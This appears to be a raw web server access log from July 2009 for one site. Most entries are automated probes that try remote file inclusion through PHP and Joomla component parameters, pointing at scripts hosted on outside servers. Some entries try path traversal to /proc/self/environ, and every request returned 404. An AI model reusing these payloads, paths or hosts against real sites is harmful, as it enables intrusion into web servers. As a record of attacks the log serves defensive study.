116.121.201.73 - - [04/Jul/2009:17:03:27 -0700] "GET /modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:17:03:27 -0700] "GET /logs//modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:17:03:33 -0700] "GET /include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:17:03:33 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:17:03:33 -0700] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:17:03:54 -0700] "GET /modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:17:03:55 -0700] "GET /logs//modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:17:03:55 -0700] "GET /logs/access.log%20%20//modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
65.55.106.132 - - [04/Jul/2009:17:04:33 -0700] "GET /logs/access_090308.log HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:17:07:42 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
67.208.139.72 - - [04/Jul/2009:17:07:54 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:17:09:51 -0700] "GET /logs/access.log//modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
116.121.201.73 - - [04/Jul/2009:17:09:59 -0700] "GET /logs/access.log//modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
77.221.130.19 - - [04/Jul/2009:17:11:15 -0700] "GET /logs/access.log//standard//3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.prismed.net/loaded61a/images/htaccess/hold?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
77.221.130.19 - - [04/Jul/2009:17:11:15 -0700] "GET /standard//3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.prismed.net/loaded61a/images/htaccess/hold?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
77.221.130.19 - - [04/Jul/2009:17:11:16 -0700] "GET /logs//standard//3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.prismed.net/loaded61a/images/htaccess/hold?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
209.51.133.202 - - [04/Jul/2009:17:15:09 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
209.51.133.202 - - [04/Jul/2009:17:15:09 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
209.51.133.202 - - [04/Jul/2009:17:15:09 -0700] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
209.51.133.202 - - [04/Jul/2009:17:16:31 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
190.144.44.36 - - [04/Jul/2009:17:19:57 -0700] "GET /logs/access.log/index.php?sourcedir=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
190.144.44.36 - - [04/Jul/2009:17:19:57 -0700] "GET /logs/index.php?sourcedir=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
190.144.44.36 - - [04/Jul/2009:17:19:57 -0700] "GET /index.php?sourcedir=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
77.221.130.19 - - [04/Jul/2009:17:20:11 -0700] "GET /logs/access_090521.log//standard//3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.prismed.net/loaded61a/images/htaccess/hold?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
77.221.130.19 - - [04/Jul/2009:17:20:12 -0700] "GET /standard//3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.prismed.net/loaded61a/images/htaccess/hold?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
77.221.130.19 - - [04/Jul/2009:17:20:12 -0700] "GET /logs//standard//3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.prismed.net/loaded61a/images/htaccess/hold?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:17:21:24 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:17:21:24 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:17:21:24 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:17:21:37 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:17:21:37 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:17:21:37 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
204.62.55.11 - - [04/Jul/2009:17:27:49 -0700] "GET /logs/access_090626.log HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.hellionindustries.com"
209.51.133.202 - - [04/Jul/2009:17:28:05 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
209.51.133.202 - - [04/Jul/2009:17:28:05 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
209.51.133.202 - - [04/Jul/2009:17:28:05 -0700] "GET /logs/access.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
209.51.133.202 - - [04/Jul/2009:17:29:59 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
209.51.133.202 - - [04/Jul/2009:17:30:49 -0700] "GET /logs/access_090212.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
209.51.133.202 - - [04/Jul/2009:17:30:49 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
209.51.133.202 - - [04/Jul/2009:17:30:49 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:17:39:15 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:17:39:15 -0700] "GET /logs/access.log%20%20//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:17:39:15 -0700] "GET /config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:17:39:23 -0700] "GET /config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:17:39:23 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:17:39:23 -0700] "GET /logs/access.log%20%20//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:17:40:53 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:17:40:53 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:17:40:53 -0700] "GET /logs/access_090212.log//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:17:41:14 -0700] "GET /logs/access_090521.log//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:17:41:15 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:17:41:23 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
204.62.55.11 - - [04/Jul/2009:17:44:07 -0700] "GET /logs/access_090608.log HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:17:44:25 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:17:44:25 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:17:44:25 -0700] "GET /logs/access_090212.log//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:17:44:25 -0700] "GET /logs/access_090521.log//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.106.21.35 - - [04/Jul/2009:17:46:52 -0700] "GET /logs/access.log/index.php?meio.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "hellionindustries.com"
61.106.21.35 - - [04/Jul/2009:17:46:52 -0700] "GET /index.php?meio.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "hellionindustries.com"
61.106.21.35 - - [04/Jul/2009:17:46:52 -0700] "GET /index.php?meio.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "hellionindustries.com"
61.106.21.35 - - [04/Jul/2009:17:46:53 -0700] "GET /logs/access.log/index.php?meio.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "hellionindustries.com"
61.106.21.35 - - [04/Jul/2009:17:46:57 -0700] "GET /logs/index.php?meio.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "hellionindustries.com"
61.106.21.35 - - [04/Jul/2009:17:46:58 -0700] "GET /logs/index.php?meio.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "hellionindustries.com"
65.55.106.169 - - [04/Jul/2009:17:49:40 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:18:02:59 -0700] "GET /logs/access.log//main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:18:02:59 -0700] "GET /logs//main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:18:02:59 -0700] "GET /logs/access.log//main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:18:02:59 -0700] "GET /main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:18:02:59 -0700] "GET /logs//main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:18:02:59 -0700] "GET /main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
209.51.133.202 - - [04/Jul/2009:18:03:38 -0700] "GET /index.php?body=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
209.51.133.202 - - [04/Jul/2009:18:03:42 -0700] "GET /logs/access.log%20%20/index.php?body=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
209.51.133.202 - - [04/Jul/2009:18:03:42 -0700] "GET /logs/index.php?body=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:18:03:45 -0700] "GET /logs/access.log%20%20//main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:18:03:45 -0700] "GET /logs/access.log%20%20//main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:18:06:40 -0700] "GET /logs/access_090212.log%20%20//main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:18:06:40 -0700] "GET /main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:18:06:40 -0700] "GET /logs//main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:18:07:03 -0700] "GET /main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:18:07:03 -0700] "GET /logs//main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.223.3.98 - - [04/Jul/2009:18:07:03 -0700] "GET /logs/access_090212.log%20%20//main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:18:08:37 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:18:08:37 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:18:08:37 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:18:08:38 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:18:08:38 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
84.207.17.120 - - [04/Jul/2009:18:08:38 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
209.51.133.202 - - [04/Jul/2009:18:10:44 -0700] "GET /logs/access.log/index.php?body=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:18:22:24 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:18:22:24 -0700] "GET /logs/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:18:22:24 -0700] "GET /include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:18:22:26 -0700] "GET /include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:18:22:26 -0700] "GET /logs/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:18:22:26 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:18:22:56 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:18:22:56 -0700] "GET /logs/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:18:22:56 -0700] "GET /include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:18:23:23 -0700] "GET /include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:18:23:23 -0700] "GET /logs/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:18:23:23 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:18:24:14 -0700] "GET /include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:18:24:14 -0700] "GET /logs/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:18:24:14 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:18:24:23 -0700] "GET /logs/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:18:24:23 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:18:24:23 -0700] "GET /include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:18:26:20 -0700] "GET /logs/access.log%20%20/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:18:26:23 -0700] "GET /logs/access.log%20%20/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:18:28:27 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:18:28:27 -0700] "GET /include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:18:28:27 -0700] "GET /logs/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:18:35:50 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:18:35:51 -0700] "GET /include/lib.inc.php?site_path=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:18:35:51 -0700] "GET /logs/include/lib.inc.php?site_path=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:40:42 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
